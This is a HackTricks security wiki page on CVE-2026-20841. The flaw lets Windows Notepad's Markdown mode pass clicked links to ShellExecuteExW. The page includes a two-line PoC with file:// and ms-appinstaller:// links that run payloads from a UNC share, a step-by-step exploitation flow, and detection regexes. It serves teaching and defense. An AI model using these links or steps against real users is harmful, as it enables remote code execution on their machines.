protocol-handler-shell-execute-abuse.md (3932B)
1 --- 2 title: "Windows Protocol Handler / ShellExecute Abuse (Markdown Renderers)" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/protocol-handler-shell-execute-abuse.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/protocol-handler-shell-execute-abuse.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Windows Protocol Handler / ShellExecute Abuse (Markdown Renderers) 14 15 Windows applications that render Markdown or HTML may hand clicked targets to `ShellExecuteExW`. Because ShellExecute dispatches registered URI schemes and file associations, a renderer needs an explicit allowlist rather than assuming every link is HTTP(S). The Notepad behavior below describes CVE-2026-20841 and should not be generalized to every renderer.<sup>[[1]](#references)[[3]](#references)</sup> 16 17 ## ShellExecuteExW surface in Windows Notepad Markdown mode 18 - Notepad chooses Markdown mode **only for `.md` extensions** via a fixed string comparison in `sub_1400ED5D0()`.<sup>[[1]](#references)</sup> 19 - Supported Markdown links: 20 - Standard: `[text](target)` 21 - Autolink: `<target>` (rendered as `[target](target)`), so both syntaxes matter for payloads and detections. 22 - Link clicks are processed in `sub_140170F60()`, which performs weak filtering and then calls `ShellExecuteExW`. 23 - `ShellExecuteExW` dispatches to **any configured protocol handler**, not just HTTP(S).<sup>[[1]](#references)</sup> 24 25 ### Payload considerations 26 - Any `\\` sequences in the link are **normalized to `\`** before `ShellExecuteExW`, impacting UNC/path crafting and detection. 27 - `.md` files are **not associated with Notepad by default**; the victim must still open the file in Notepad and click the link, but once rendered, the link is clickable. 28 - Dangerous example schemes:<sup>[[1]](#references)</sup> 29 - `file://` to launch a local/UNC payload. 30 - `ms-appinstaller://` to trigger App Installer flows. Other locally registered schemes may also be abusable. 31 32 ### Minimal PoC Markdown 33 ```markdown 34 [run](file://\\192.0.2.10\\share\\evil.exe) 35 <ms-appinstaller://\\192.0.2.10\\share\\pkg.appinstaller> 36 ``` 37 38 ### Exploitation flow 39 1. Craft a **`.md` file** so Notepad renders it as Markdown. 40 2. Embed a link using a dangerous URI scheme (`file:`, `ms-appinstaller:`, or any installed handler). 41 3. Deliver the file (HTTP/HTTPS/FTP/IMAP/NFS/POP3/SMTP/SMB or similar) and convince the user to open it in Notepad. 42 4. On click, the **normalized link** is handed to `ShellExecuteExW` and the corresponding protocol handler executes the referenced content in the user’s context.<sup>[[1]](#references)[[2]](#references)</sup> 43 44 ## Detection ideas 45 - Monitor transfers of `.md` files over ports/protocols that commonly deliver documents: `20/21 (FTP)`, `80 (HTTP)`, `443 (HTTPS)`, `110 (POP3)`, `143 (IMAP)`, `25/587 (SMTP)`, `139/445 (SMB/CIFS)`, `2049 (NFS)`, `111 (portmap)`. 46 - Parse Markdown links (standard and autolink) and look for **case-insensitive** `file:` or `ms-appinstaller:`. 47 - Vendor-guided regexes to catch remote resource access: 48 ```text 49 (\x3C|\[[^\x5d]+\]\()file:(\x2f|\x5c\x5c){4} 50 (\x3C|\[[^\x5d]+\]\()ms-appinstaller:(\x2f|\x5c\x5c){2} 51 ``` 52 - The vendor fix described by ZDI restricts accepted targets to local files and HTTP(S). Extend detections to other installed protocol handlers as needed because the registered attack surface varies by system.<sup>[[1]](#references)</sup> 53 54 ## References 55 - [1] [CVE-2026-20841: Arbitrary Code Execution in the Windows Notepad](https://www.thezdi.com/blog/2026/2/19/cve-2026-20841-arbitrary-code-execution-in-the-windows-notepad) 56 - [2] [CVE-2026-20841 PoC](https://github.com/BTtea/CVE-2026-20841-PoC) 57 - [3] [Microsoft Learn — `ShellExecuteExW`](https://learn.microsoft.com/en-us/windows/win32/api/shellapi/nf-shellapi-shellexecuteexw)